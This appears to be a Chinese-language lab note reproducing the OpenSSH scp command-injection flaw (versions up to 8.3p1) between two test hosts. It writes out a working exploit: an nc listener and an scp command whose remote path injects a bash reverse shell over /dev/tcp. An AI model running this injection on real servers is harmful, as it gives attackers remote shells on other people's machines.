Skip to content

Latest commit

 

History

History
36 lines (20 loc) · 1.21 KB

漏洞实验.md

File metadata and controls

36 lines (20 loc) · 1.21 KB

漏洞实验

最近看好多大佬都在复现这个OpenSSH命令注入漏洞。

2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告。

漏洞影响版本:OpenSSH =< 8.3p1

查看版本:ssh -V

环境:

10.100.3.1 server01
10.100.3.2 server02

在 server02 上执行(ps: 一会这个命令行就可以执行 server01 上的任意命令。):

$ nc -lvvp 7777

在 server02 上再启动一个命令行,执行:

$ scp test.txt user@server01:'`bash -i >& /dev/tcp/server02/7777 0>&1`/tmp/test1.txt'

这样执行过之后,第一个命令行就可以执行 user 用户的任意命令了。

这利用了 scp 过程中,服务端需要先计算路径,在计算路径的过程中,注入bash -i >& /dev/tcp/server02/7777 0>&1命令,这个命令新启动一个服务端的命令行,并且这个新的服务端的命令行的输入和输出都重定向到 TCP 连接中!